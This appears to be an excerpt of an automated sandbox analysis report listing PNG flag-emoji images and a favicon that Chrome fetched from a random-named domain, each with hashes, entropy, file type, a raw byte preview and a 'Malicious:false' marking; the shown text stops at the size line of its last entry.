                                  SSDEEP:48:5Y07azs4MdXdL8BCKx4PXnE2LJxPsLk3F9dcCd:5YRz2dXBDJnZEW9N
                                  MD5:FF2989744D4813C906047582226ABD28
                                  SHA1:41B973276F7A99AF05115B89B401ACEB02F573C8
                                  SHA-256:3151F7930D821BCCF4A76CBBE4A3533E2B56BDFF696F260C864AB639AC7526EA
                                  SHA-512:ADD07F186C255E361094878A71EB4257C4E60A6E4908BE168FBFAC30F768B18E0E292F59E80D75D78EB79FB62C820C03C512F07BDA6D8D1C323506E5D173BDA2
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/chat-bg-br.f34cc96fbfb048812820.png
                                  Preview:.PNG........IHDR...2...2......].....GIDATx....O.....y....}.1,...r#..H96.C.j.......s.N^L.3?....*}5..I..3..y.a..........x......7}.;y....e....7.v...7I....Y.gq'..i'J.....vp..~.G.m.}...._../6W?.\....'..}.....`.~?.c9.2...t.fg...Xg.g4M.0ua..0.#.~.j..i...w.ep....D..Y.Q..Gu.. D..Tg.O..Y"#.......\.M.cm*..&.>....4c......Q.I.L.+L...Tm....@b..U...L..IL..TqT..wG.....F...}....C.{g..!I.J...SV.!.....^.... .h"...2.ow)+.2.......U......8..j..ezB.]..pwxR..pr;..K/_..D.@..Lda....dH...4..L.GUm....L..c....x$..@o.0..._<..sT..../*=..7....1..6.Y8.2.="..T....:r..U.I..M....B. ^..2..0..A;w.[k...4..j.|48..8...;.4m.`....9*.".dZ...BK~f..#..........*@s.7M.)7...YzZd!.....F`.i.".1...@G..~.J...X....k/.,...4.-.'.'.@.=):.+.].i"&.Lb....F.Vk.Xx.d...E.q.1...;...&..g...4......S.0*.0*.8*dwC....,.%2.p<(......w....6....D./....n..D..yV....nv$~Rv....nL...l....53.2.4.8S..Q..e=.2.#...sg.^.....`..q...N<n..^.(.........Q...=.+...\...?. .......;..@Og._....Yi(,.T>[.,,f.d.Hd.......t3[..B..b.H.u
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4367
                                  Entropy (8bit):7.9339578192229645
                                  Encrypted:false
                                  SSDEEP:96:3965HMPQ27qyQkwL6sQjJbAXMDczpFBgqG2tkC+/QXo9:t65HMPvZsQjtIEcxgqd+4Y9
                                  MD5:DD1CFFDEE6E1A164FF44403D55389362
                                  SHA1:1A8CF2A3BCB54E148751BB1A81FA332387C3E8FE
                                  SHA-256:4AC04BECB9527E2D3117DD4746BEB5BEE6A2A5029FC30E19D3C4525C0296816A
                                  SHA-512:12442F81CD188F9E48D2748F50F7A4D41694C3F6AAE33ABCA2129B59878D122AC69F5849888930CAAD3633F627B7C6823F4D674C2930DE4912B8D0DBA74F862C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1fa.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.Y\t...nqx. .rus..s...IM.ru. $.'-.%+t...9?.mpt....../1.rut...HKs...mpr...vyl...lo{."u...vy.XZ.ilz."m...BY........V..R.....W....T.Y...g.....q..e...h..[...}..n..w..v....o....h......Ti........|VZ........W.....L.{.vz..yY...rv>.e.nq}.R.hl.ko.cg.YY.gj.^b8.O|.{.RO.hkc...[a.`d.SV.be.n@.JJ.V\.A<.]p.[^.NV.QV.CD.a.km..PVSr..DH.FP.Mh.Uwhd..**8t.tdb.3C.88Ii.Ve..<E.y..DO9l.*q.*q.*p.*p..t.$r.)o.)o.eX..x..Ip)n.(n..t.&m.mRy&l..p..:n$k.%j..4A#j..,,.:K#i."i.5c.#h..%$!h..m.A\. g..%#LX..C].8?.i. f..e..('mIi.e..d..i..c..:R.b..(*.a..a..e.TLu.`..f..).._.2V.'Z..^..^..,3.]..b..\.:O..[.....Z..^..Y.-N..Y..&*.X... .&+.W..\..W.c9Y.V..U..T..T..$(#L..S..X..R.9Bp....R... .Q..#).T..P.....E..O.r)AE9a.N...!.M..M..M..!%N2W.L..L..N.....K..K.~ %....J.....I.....?t.H.{.!...y.....r..x..l..Q.h&...$tRNS....,8AQU\accglrx~.....................B....IDATx...;..E....<w.{.(DI.P "A.H...P...5hhih..h.[PRGB.CHGE...G...v..id[..m.\D.....~;.Y...................J.f.Rj...".H....TR[..y.TI..u
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows icon resource - 3 icons, 32x32 with PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 48x48 with PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                  Category:downloaded
                                  Size (bytes):2409
                                  Entropy (8bit):7.8337791782799115
                                  Encrypted:false
                                  SSDEEP:48:aZ3wanKjwC5o1Tt7WeBs0ThqaFfga5INLKr:2gdwC+1TEANq0fP6Wr
                                  MD5:1635ED0E8715C40D4BED875B7494A93A
                                  SHA1:CA2C72821B30194B9B6DAF9C8C0CE1723FE54614
                                  SHA-256:504B4621E486970F8C1721D5297561C9F33296F516C83FBB33A0FF3F4F7C1357
                                  SHA-512:F710268687FCD3DA9BD9FFEE9CBF166D21598CAB5FF1172C510FD478F57300AF7112F35132BA345A2242B65FF53CDE9DE6EBF0F1EA8CF7F5FCE17C832A5A85D8
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/favicon.ico
                                  Preview:...... .... .1...6...00.... .d...g......... ..........PNG........IHDR... ... .....szz.....IDATx...'x.@...........x0.00.``.a........[....p.........~[eg....\9y.v..Yg..............iQ/!..<..v.R98;?.c.U..F.r6.#5......("7.E...Fp8..z.|..........N..9#..Kv.....4.~.b..|Nx..l}.F..../...\..Wj.....O...E.m~.f./....7".o.3...$7T.JM.J./....+X.w...].D.n.CAR..q...h.<..cr..j..[.\..5j4/...-...Y.H. .C..HS9..#s.....W..g-.Rp.I.mT.]~4...D:.<1'....i....B?Rd.7.w\..@|..aRn.F....k0T.H.'0I.......c.!_.Zt...+..Y<x\$....i].8..e.`.\....z.....n.mg.l...R.P..3..c.:.Z..b.......2fr..R.".y.x....tE......<1O..+l.<.xI.....KR.t9y...8O.B.J.1.+.,e..[.p.ux.T...f..n.O+1...x..[...X8.j..J._..y=.P@F@.../.Q- )...h....+.E)....O...Gf.<%../[...m....d..$..m......s....(.-...Zg.....:7...EL.r...Q..k..q.Q..r..k..9...Z..yF.K.{.F.5}.Z........#..Y.0u..kE....5ywr......IEND.B`..PNG........IHDR...0...0.....W......+IDATx..Y't.H..h..`Xzo.............{.....]..vm.(..]......M....}e.E/..3...G...G..-._....~
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4378
                                  Entropy (8bit):7.899556731715149
                                  Encrypted:false
                                  SSDEEP:96:7BP8cYkpX1qVoR/dM8SNX3ZN49Wx7P1glV9UGaRKdrcZI3AiB:xkk522U3Ec9glb3aghwiB
                                  MD5:A630FE243F5E7883D5EE6BB5B90FBCC1
                                  SHA1:74D7C8EE525B804D70CF0A55DC38F68E6A91B0C6
                                  SHA-256:FA0C38499D039D786AC590C97BCC7222090D1BFBFA40C11861EC706D4C60010F
                                  SHA-512:B7B6DB5D5EF4B204D1D4B31278EB66FF972A93CDE6B0126CB507BFEC16AB36799D37BEFF3138015D5CD4E75B60E13A01087676AD4A87AEE2FAED2BAA364F9F99
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.N7.]t.%.ar.#.`s.$.hu.&..Z...4}4.-5w '.em.......".t..e.u.%.as.$.dq.#y!).in...`w (o. .e.j{#+..Ym....H........................................r...........G......%...&..$.....$..$..+..5..".. ..@.....*.............=..*..L..........V.'...<..,.d...K.....`...$...2....8..Z...C..........X.#.....E...3.....R..o.n.........C..B...t.`._}.4.......3...e.GK.P..$R.Qu..O.N...F.NX.J.an...L.LH.JI.I...G.FV.?.xWE.Db.?D.Cp..B.Au.I....S^;.A@.?=.>=.<.hN.HW.vH;.:.GU.GU=.<9.9.FT.DS.VL7.7.DR@.7.BP.>O.x./.54.4.BO.?Ml.12.2;.:.t..=K1.1/./.7I.]?.?L.:H..-.8F+.+,.+:.6.6D.9F*.*.;G.3Ajm1.-A.2?.K8|_1.2@./>(.(.9C./=5.2.2?Pr).,;3}3.3>.,:.*8&.%.%9.O0.4?.(7c\5.+8.'5.+6.$2./;.$2..1"w".09.!0."0.,6.!..&1.i..*3..*.#-2W..&...'..&~%,..#{.'..!v."r..k..f......&tRNS.....%19=PWbbbdjj}}~~.................Yv.....IDATx....e.Y...z.{.......2..Q..F....^.a@.1.s..^.A.[/.W........Q.".....1..L.22.33m.bg.....N....Z...k.[.S....z..9.jh.......h.R..x
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5812
                                  Entropy (8bit):7.859815494296591
                                  Encrypted:false
                                  SSDEEP:96:LCDQF3ztLGoUkHS7ZINpCCt2sZdUFer3m1nFkMQBWWjn5agQsbnt+i+bTc:LL3xLFNyNI/lt2sQFerwFkMQBWAYPsb/
                                  MD5:43F5284399658826F245912227CD92CB
                                  SHA1:15ABA54793F8A80D94F7544DBC51B9E4A4C60A8C
                                  SHA-256:33299CFF5D86D9199281E85342523F9EA54B81EE51CDCBEF29A5703F3D3FD292
                                  SHA-512:9282A3705F16D116B4D9101DA7667B74B39EF4E917DB574B7C9268DDAECB07CB729D332A8EF50586136B3ADA350A8BE98FB4B78507EBCFFE6434F2B9B95EEA48
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.It.Iv.M{.W.._..e..j..l..m..n..o..p..q..s..t..v..w..x..y..{..|..~............................ ..!.."..$..$..$..%..&..$..".....0c..8.dW;.r5.}@rg:VO3m_-IF,..<..A..I.O..U..g..S..Y..awqDmkgb\T@1'@;.#! -/,5%.(CUELNV>/-y.0p.4Vk.m.p.....Y...s.A..R..r.{Z.iOn^.;."='.).!6.&.R.jA!c7.k+.Z+ Q. G/$.=.t6".F..P0..m.}....PT&Yq uU....w.............#ji \N'8G9=?J\^dm=..S.z]...............b.i...................................Nn..p.\hsMY9....\..S..Gk.Jo.Ci.?c.;^.=_.@c.Hk.Cf.Ei.Eh.Ei.Eh.Cf.Fi.Fh.............................................................xyx..................................................................................................................................................t..G{..q. {. ..!..'..$...w..g..X..Nr.Ry.^..c..m..u..y..{..s..j..a.._..f*.....tRNS.}.........................................................................................................................................................,Hf.....Xi 7....fM~...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3893
                                  Entropy (8bit):7.883451824570228
                                  Encrypted:false
                                  SSDEEP:96:mVHCQyKbQllH90bRCgZtzDDQ5gwNKIf0CU+X:8HCQbbcRYIgZt/s5rSCLX
                                  MD5:5395A259D040862369A5EDAB491F21F8
                                  SHA1:BA735E3A28DEB0F781A1878B7233FCADC82FB74C
                                  SHA-256:6C2CDF71ABA7113D7E2794B4641290B0D572409FBF984A4FCFDA12B943BA18CE
                                  SHA-512:FAFBE87DBA9CA73CAAF46354E83BD506E630BB366690C2150B4527AE40F2162ECB0162F12F4E9ACD471434BDEAA2AF473FF6B3A5DD357D7477350981A8B3CF6E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.z}.y}.rw.jq|||.py|||}}}.dl|||.s{.LU...uuu.......%0.jryyy.^f.......$/u...0:vvv.s{.gn...vvv.mu...ttt.OY.s{.go...xxx.hp.t{....lsuuu.px.gn.GQ................................................................................................................................................................................................................................................v...........u}....dq....qy.nw....kt....hq.ov.dn.fo~~~.`j.[f.dlzzz.Vc._i.ai.Vb.Q^uuu.KZ.Xc.[d.LZ.O\.ET.U_.DS.HV.?O.OX.:K.JV.:J.9K.9J.;K.8J.8J.BO.7H.8I.>M.:K.5G.6G.4F.5F.4E.2D.2D.2C.?L.6F.2C.0B.,?./A.CM.6E./@.-?.7E.,>.+=.*<..>.);.(:.'9./>.(:.&8.%7.9C."4.%6.$5.%6."4.&6.!2.0<. 2.'6.!2.$4.'5..1../..0../..-..-.%3..,..-..+..+..)..)..'..(.#0..%..&.#/..&..$..$..%..%..".....!..&......w..........tRNS.....#-2A@PW[_abbbhsz~~~~.........................................................................................................................................7O...DIDATx....j.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5522
                                  Entropy (8bit):7.89732042805329
                                  Encrypted:false
                                  SSDEEP:96:SvpkZ991yyfbiqhvPZ5O5aJKQ/42GeJIeuiK2ZaL0v3MSdum4FQuejXAa+c:Sva9Vf28PZOaJKQ/42GQSO6zQuXUjXAo
                                  MD5:C7C4FD0341DC050CB815C064C5C54989
                                  SHA1:7CC1F084EB9F4EDA385675A35ACB8DAA38523657
                                  SHA-256:65F564B75A4392406456D621FF8642343845D900B53BB61FC03B613A0685BD1B
                                  SHA-512:FCD99803639182DFCA1C0FEAB498A90ACB849EF16C2C7C43BFA2CD8DF7593759C51EB40988F867623148CDADBF22046680C19066F62D0600D47B29C27F9A6789
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLHd2o.a.._%H...k;R...^z.y4P...M H..|.{.y......nc."J...Jv.t+H..z.........Y{.y H.tg.$M"y.w..Z!J y.w.G.|.z..]vh.!I..._v.v}.{&N$.@.>M...Y.C.od...2.. ........!..... ..%..&..&.....%..$..$.....#.....".. ...........(...................................)......................................*............................!......1......../...............A.....X.........../........F..S....4......A.....G..,.....0.....=......|.z..b........-w.u...n.Ap.ni.f...q.o...k.ga.^c.ag.6Y.Vi.h...W.K[.XS.O`.\...M.IP.LM.IL.H_.,N.IL.HQ.NV.RK.GZ.`...K.FI.EH.DH.C?.LI.EF.A.z.M.I>.GD.?7.NB.?.u.@.;K.,D.V2.L@.<.p.A.?2.D<.8>.;9.5xj.>}:-.A<y6..75|1qd.'~?8v36q3!x8f\.-r,4j0)i)0c,UN."b%*\''V%KD.&P$.K..D.:5..=.)&.!!...........................................................~w.....tRNS.....(,8<CWXabccgik|}~~...............................................................................................................................M......IDATx...{.\.}...y.{.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5061
                                  Entropy (8bit):7.941238820075474
                                  Encrypted:false
                                  SSDEEP:96:ZeG+LxPAYd3DbVCWqt5+rElUo/ETHeeJyes0r5XYnZD1DVFVHsgnrp+8CdjCkmdI:ZYPAY5XVCblr6NJFrtIDVFeqcCkaI
                                  MD5:E4215711F61DBE71E4EABB04628A7422
                                  SHA1:A165CADDCA5D32C11719B1E4AAC62EAC35BE602D
                                  SHA-256:5E211B8DF63A6AD5899F7B12A12AD488FA4DA16F3C8C4C8EA3A1BBC470770B25
                                  SHA-512:AB22B803196593ECBFE95D38164248F858B58567916F1038C5B860F48B52B35A93819E945EA9D3B9B353D915057F49784EDE5D16D6A29F30F61A4DEBB2A89B13
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1fc.png
                                  Preview:.PNG........IHDR.....................PLTEGpL1C]...4F`...1D^......2D]...3E_...Kb.?W}...1D^~../A[.|.cc61Ii...1E^Vj....3E^......3E^...0C\...6Hb...*<U......8Kd+=W.....#..'..0.. .....6..'.....>.....)...I........S........7.....`...........G..k........y........\......,........n...........<....xqp..._...........p..C...~.....{..}.....v.....z..p......Mp..p..d...do..o..n...idr..}..n..n.....m..m..v....ri..l..z..k..k..j..b..o..i..e..y..h..q..v..i..g..`..f..\...1f..d..c....]l..p..c..f..o..a...VOW..a..`.....v.sY.._..b..i..^..Z..a..S..l..]..\..R~.[~.T}.a|.e|....Y}.]|..~.Y|.X{.Yz.Wz.ez~Xy.Vy.Uy.Yw.Tw.^v..DAKv.Tv.Rv.Qu.Ut.Qt.Hs.Os.Or.Uq.Nr.vr4Nq.Pp.Lp.Lo.Bn.En.Kn.Rm.Kn.Gn..73Jm.Il.Jl.Hk.Nj.Cj.Gj.=h.Fh.Gf.Le.`fF>f.Dd..--Eb.7b.G`..))@^.7^.E\z?\.7Y.@Wv:W|...9Sv=Rm7Op,O.:Nh3Lm...6Je0Hi3Gb'Ex/B^+>Y(;T.K.N...'tRNS...."/88CTTccbefot~~~..................e_.Y...MIDATx...=.#U....y.....s....B..v.....fk.E.....X.Ym.k...\..JD.P...I6s...a23.s..}i.7.H 3...0..F..h4..F..h4.]G.Ym.h..PS!.........
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5061
                                  Entropy (8bit):7.941238820075474
                                  Encrypted:false
                                  SSDEEP:96:ZeG+LxPAYd3DbVCWqt5+rElUo/ETHeeJyes0r5XYnZD1DVFVHsgnrp+8CdjCkmdI:ZYPAY5XVCblr6NJFrtIDVFeqcCkaI
                                  MD5:E4215711F61DBE71E4EABB04628A7422
                                  SHA1:A165CADDCA5D32C11719B1E4AAC62EAC35BE602D
                                  SHA-256:5E211B8DF63A6AD5899F7B12A12AD488FA4DA16F3C8C4C8EA3A1BBC470770B25
                                  SHA-512:AB22B803196593ECBFE95D38164248F858B58567916F1038C5B860F48B52B35A93819E945EA9D3B9B353D915057F49784EDE5D16D6A29F30F61A4DEBB2A89B13
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL1C]...4F`...1D^......2D]...3E_...Kb.?W}...1D^~../A[.|.cc61Ii...1E^Vj....3E^......3E^...0C\...6Hb...*<U......8Kd+=W.....#..'..0.. .....6..'.....>.....)...I........S........7.....`...........G..k........y........\......,........n...........<....xqp..._...........p..C...~.....{..}.....v.....z..p......Mp..p..d...do..o..n...idr..}..n..n.....m..m..v....ri..l..z..k..k..j..b..o..i..e..y..h..q..v..i..g..`..f..\...1f..d..c....]l..p..c..f..o..a...VOW..a..`.....v.sY.._..b..i..^..Z..a..S..l..]..\..R~.[~.T}.a|.e|....Y}.]|..~.Y|.X{.Yz.Wz.ez~Xy.Vy.Uy.Yw.Tw.^v..DAKv.Tv.Rv.Qu.Ut.Qt.Hs.Os.Or.Uq.Nr.vr4Nq.Pp.Lp.Lo.Bn.En.Kn.Rm.Kn.Gn..73Jm.Il.Jl.Hk.Nj.Cj.Gj.=h.Fh.Gf.Le.`fF>f.Dd..--Eb.7b.G`..))@^.7^.E\z?\.7Y.@Wv:W|...9Sv=Rm7Op,O.:Nh3Lm...6Je0Hi3Gb'Ex/B^+>Y(;T.K.N...'tRNS...."/88CTTccbefot~~~..................e_.Y...MIDATx...=.#U....y.....s....B..v.....fk.E.....X.Ym.k...\..JD.P...I6s...a23.s..}i.7.H 3...0..F..h4..F..h4.]G.Ym.h..PS!.........
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5112
                                  Entropy (8bit):7.82093622729016
                                  Encrypted:false
                                  SSDEEP:96:5yWihsTBR1geRxNeQdXhFTxiFtO+4sHzA:5yWiCBR1xZXh/g4sHzA
                                  MD5:AEDE2CD4321E411ABA2EB1FA94E37FB5
                                  SHA1:2C61170535BCB096CEF2DF3C9A1FB796BE377A6C
                                  SHA-256:1B948DBE243C0FAE2AC95E62EBBAFE3C5CF4DB076CE2F1F2CEBD5984726E92E5
                                  SHA-512:B415900E786353B4ABF1EC456FA6DBEC7C01715470E54509ACE0AD8DA7C0252C1478F66F643C6927FE5F2C10C53837D03AC81AF07F8E719E6A055E8EBCCD6F68
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL......................!#.&(.,-./1.-/..0.(*.!$......e%&.&'.56.86V<<8@=r99.81....(*.)*.&&....$.............|..e..e...........A.g^.}^.~^.~`..W.yq..G.lH.kJ.nW.yZ.{Y.zO.rR.tV.vb..c..R.s0.V..EO.syu[.HH.;;.HD.qQ.::.12.34.24.24.35.13..0.*,.&)."%.. ...................................................c78CCCAAA@@@???>>>===<<<;;;:::999888666444111///---,,,*))'''$$$""".....................................................................!""...+++&&&'.....H..r..&..D33.<&.U,.d.#pA..7..8..8..9..:..;..<..>..?..B..B..E..F..J..M..Q..U#.Z&.Z".W..S5.e>.i?.h._Kd.f.KIj.X+.`+._,.^,.]0.`2.b3.c2.b1.c1.c3.e3.e..fP.a;.a1.]8SCEkA7.J..H..E..CxR)'.R..X5.]5.[/.V-.R..F&.Q..<..A..H..J..J..M..P!.T&.X).Z/.]<.eC.iF.lG.nO.tW.yY.|b..e..e..]..T.|J.vA.o9.j9.hJ.sV.|..................................nV....tRNS...........................................g........'IuS:....DM..\......................................................................v...a:(QX..................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3422
                                  Entropy (8bit):7.906198132802901
                                  Encrypted:false
                                  SSDEEP:96:EcWdJWRTOCfQBMyZPo/d3t7ygzfXw2aBr:moqCfIMy6/d97x7XcF
                                  MD5:116DA5CB69963471852D96FE4A21AA8E
                                  SHA1:6B9D6FA2686D175BE83C6F9C2EFC5A11521A31EA
                                  SHA-256:CF3254BD8F3B27FFDB6831BEE3CA5A5F74C5F2C05F89C9E322F76F60AE53D5E4
                                  SHA-512:8F7E5568B6516FAEEC7700061C85E4960ACCF03C4FEF29A66F1CC1B8A8D9690F781CAE2087C3043EC842E0642B7E0C884B50B8D938C9A5F95BE0D68B5106866F
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLmXS...nii.r\..f.....;2".sw...b.}.....Q'".kpl.|.rw....F$..4...<D...Z.u.qv.F$...e.!.T).jB.sw.G%...c.~...<~[a...F#.rvc.~.ej....H&....F$c.~.J)...c. .txw'-.F%c.~...f.#...L.i`.|.mqa.....6zW.P-...............................................................................................................................................d...uz....^g].y....mr.\d.djN.rS.p.fk0.f.ag.Y`D.i/.e:.g.S[.Y`C.f.PW0._.IQ(.].BL>.`.RX.@K.MT..[.?I..U.GO..T.>H.AJ..T..U.<G..R.;E.:D..Q.CK(.T..P..O.8B.<E..N.3?..O..M.6A.FK.2>..L.5?..J.5?..J.:B..J.5?.2=..I..H.5?.1;..H..I..F.1<)vN.=D.0:..E..E.5=./9./:.-7..D.-7..C..B..C.+5..A./8..A.+5.*4..@.yB.*4.~?.29.(2.7=.}?.uB.(2.&1.|= kD.{=.&/.(1.z<.&/.%..$..$..x;.$..$-.v:./5.*2..5.m:.r7.#-.f6.j4.'..!).`3w&,.a/.[0..%.W)j.%.S)s.!.K(.L&d...F#.C!]...E.....@tRNS......%%1479EDIRW_aacfgihqw}|~.....................................1....IDATx....n.6...D.V..s.l..}..4..vX.....{...>..k....(.bI.7qd..s......i...}.e...I.6SSSSSSSSSSSSSSSSSS....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3940
                                  Entropy (8bit):7.916267176919574
                                  Encrypted:false
                                  SSDEEP:96:HvD1kj//CPhExqT4K5G8DjGQG1RC3r2gBkhunMU7mnkajhn:PDK/c0nkqQG1AxMU7kjhn
                                  MD5:4AD293A96E9C3C75DE74BBA2A68EDB64
                                  SHA1:05FBA1CEC987958592F736E6E530E2157821C1C4
                                  SHA-256:9FE01B95AD18EA8A2316374891D21A77718B01490F7470FC76E20DBFEC3AB405
                                  SHA-512:D06C500A6F85AB453241BB0D380CB6B51A2DC69FB9675F60CEE8706BBBD30109018573153263B8BDD61C482BB6134C5CE93B854EF3E0FA04F10DA620CE9394EB
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLk .......g.....k.....j.....i.......BY..-&.7u...j.....j.....w..."l. ^.........j.....j.....k .g........k........l!..........f..a..............................................................................................................................................................................................................u..i.._|..H0.K?.F2.J?.I=.H=.I>.F;.KM.F<.D9Ho..B7.B7.;%.C9.?4.@5.HT.=2.Lf.@7.<1.:/.8-.2..<3;c.yNx.6+.4)^T..5+.2'.5*.92.0%.5+..#BT..6..,!.-".'..7H.:T.*..-#&W./T.%V..3/.)..1)$U..-#.'.#T.YCy.'..V..X."R..$..$../)>H. P..$.0J..O.$N..T..)!..&.M..L.."..P.y-E.J..+%.I..!..H..!..F.~)#.$..J..E..D..B..A.u'!...X,Q.C..@.}!..?....B/er$..>..>..<..3t.>..<.p ..:.}..w...8..7v.8.i...6..0..6..5..4.k...3..2..1..0....b......,..*z!.J.'o.!.."b. _..dg.7K...,tRNS.....%%56=MTcccdffwv~~~~............................IDATx..K..V...s...~.......)(...l..E.E..?.5?.6,..(RXD(.v...E.h2.dz^.]o..C.....fj.L.._...v...s.=n::::::::::::::::::...|q.$)8.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4878
                                  Entropy (8bit):7.940632368685932
                                  Encrypted:false
                                  SSDEEP:96:c2wSA7NLh7KmdWlrgT2c25dDcrI5O5PBYER28kH6Eo0YLkbaW/qi:c2VABLNKmKgyzDLOj3jkH6vNL+/
                                  MD5:C958A438BAC689C382F7D552484303C5
                                  SHA1:B3BC3BFE8CF82B94B8AD2A63DCD7BEB4AE92C907
                                  SHA-256:B72FE0DBC860ABC0BA7A4D6369A5D7C5F6A0FD7BE1E51BBAD7FEF9CD0C3D161C
                                  SHA-512:12B2FD1321AA0F58DAE204E82700C3FC6515A83C3C5DAD9531ECAF329C30849B0D2D88767CFB4C21E4FBD6E6286105AA136EC7B97F6579A7422B8E232D6B1083
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f7-1f1fc.png
                                  Preview:.PNG........IHDR.....................PLTEGpL9ltd...B7_...B3g...B2f....".c..WF.A1`...D1.z..Ks._.e...B2i..<w..B2`...@1h...C3d...E5k...<-\....$../..%..8..6..8..%..7..5..4..2.....1../.....<..,..+.....*..(..E..'.....$..#.....!.._.......?..........(........H.......p..........,...........M....(....&....t...........5..9b..i.......Wr.U..D..#b....#V..I..].....J...U..+o.m..1L..>..Q..4...?n.f<..R.]...R..W.~D..H..-..&..m.2%..%..r.O2..$..\.p%.."..K..!..9.....|. ..A..b.^...%..I..8..*..;.b............?~.*..M~n...1.....0.....I.=%.o...$.n......8{.".m.~....".j!|.....~...h.|.'w..}..z..{..}..{.Uo...e)~N..u.v..x..|a.x..w..~a.u..t..{^.o..q..v\.l..r..|m.o..x[.p..o..qX.m..g..uX.i..l..rU.lT.b..sc.pT.f..mQ.]..^..dN.gN.kN.`..iL.fW.]I.fI.cH.YD.W..^E.^R.TA.X@.Ov.UK.O=.Lr.Kq.G..R<.Jp.J:.M8.G5.D2.A0.<,.9).b..... tRNS....(,;E_ccbct|~~...............Q.}.....IDATx...o\.y...9.={.)Q..6.H.#)R.J..&i.\.4........|*...........u..ARCi...]_.[..B`.R.r).%R..\..23%wO..v.\...e............%}....O.>}..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4365
                                  Entropy (8bit):7.928880957753644
                                  Encrypted:false
                                  SSDEEP:96:OkUv8F2qke4TGHm4Zb26czp5kpYNzlY2/+iR6JB:OkuR96rpYNBL+C6P
                                  MD5:EE737E0DE9AFEA578DBDA2834D4CA878
                                  SHA1:55426DB9DC28BF78BFDE4D03CB33A17945E67065
                                  SHA-256:F5DDCBD93BDA7C88260BE93F87710CE94EF58B13E47E54CD7D37B189C20F14FA
                                  SHA-512:84D5AE86AFDDBE153B0415953D930065A22BD33F8DD9B69325AF919474B33787FFF73104AA584ADCB8489B4157562C32BF41E4032DD2E3CB0119874838EA25D5
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.AM...j.$...g.!...f. ...i."......m.&....w...3...f.........EQv...........h.!i.#.....g."......j.$h."...g.!......k.%...`................................................................................................................................................................................................................................................................................................}..........p.....y..b{.ez.Yr.Li.Jd.Of.ho.A_.Xe.9X.4V.:U./Q./P..P..P.-O..O.,N..N.,M.)L.*L.*L.,L.)K.%H.'I.(I.*J.%H.%G.#E. D.(G.$F."D.9L. B.'D.!B..A..@."@..?..>..<..=.$@..<..:..:..;..;..:..8..8..;..7.!;..6..5..4..5..7..3..7..3..1..0..3..7..1../..2../........3..1..3..,..+..,.....*..*..*..-...../..(..*..$..*z.,..%r.*.."..#}.%n.%t.#{..i. v..m..f..`.........)tRNS.....!+49JL__abbsr~~~~...................2.+7....IDATx..[...u..U....pWX^L.l..i&.,Y"..~0.#..(.b .. oA./..|. y.....K.+...BC.`I.-..wg..]u..Vu....{93...<?.tw.vw..T...p.+V.X.b.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4635
